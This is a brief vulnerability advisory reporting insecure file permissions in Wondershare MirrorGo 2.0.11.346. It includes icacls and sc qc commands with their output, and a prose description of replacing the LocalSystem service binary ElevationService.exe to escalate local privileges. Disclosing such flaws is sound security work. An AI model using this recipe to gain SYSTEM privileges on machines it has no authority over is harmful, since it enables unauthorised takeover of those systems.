Authored by Luis Martinez

Wondershare MirrorGo version 2.0.11.346 suffers from an insecure permissions vulnerability.

# Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-23
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/mirror_go_full8050.exe
# Tested Version: 2.0.11.346
# Vulnerability Type: Local Privilege Escalation
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Privilege Escalation:

# Insecure folders permissions issue:

C:>icacls "C:Program Files (x86)WondershareWondershare MirrorGo*" | findstr /i "everyone" | findstr /i ".exe"


C:Program Files (x86)WondershareWondershare MirrorGoadb.exe Everyone:(I)(F)
C:Program Files (x86)WondershareWondershare MirrorGoBsSndRpt.exe Everyone:(I)(F)
C:Program Files (x86)WondershareWondershare MirrorGoDriverInstall32.exe Everyone:(I)(F)
C:Program Files (x86)WondershareWondershare MirrorGoDriverInstall64.exe Everyone:(I)(F)
C:Program Files (x86)WondershareWondershare MirrorGoElevationService.exe Everyone:(I)(F)
C:Program Files (x86)WondershareWondershare MirrorGoMirrorGo.exe Everyone:(I)(F)
C:Program Files (x86)WondershareWondershare MirrorGoProcessKiller.exe Everyone:(I)(F)
C:Program Files (x86)WondershareWondershare MirrorGoProcessKiller.exe.config Everyone:(I)(F)
C:Program Files (x86)WondershareWondershare MirrorGounins000.exe Everyone:(I)(F)

# Service info:

C:>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ElevationService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program Files (x86)WondershareWondershare MirrorGoElevationService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Driver Install Service help
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

#Exploit:

A vulnerability was found in Wondershare MirrorGo 2.0.11.346. The Wondershare MirrorGo executable
"ElevationService.exe" has incorrect permissions, allowing a local unprivileged user to replace it
with a malicious file that will be executed with "LocalSystem" privileges.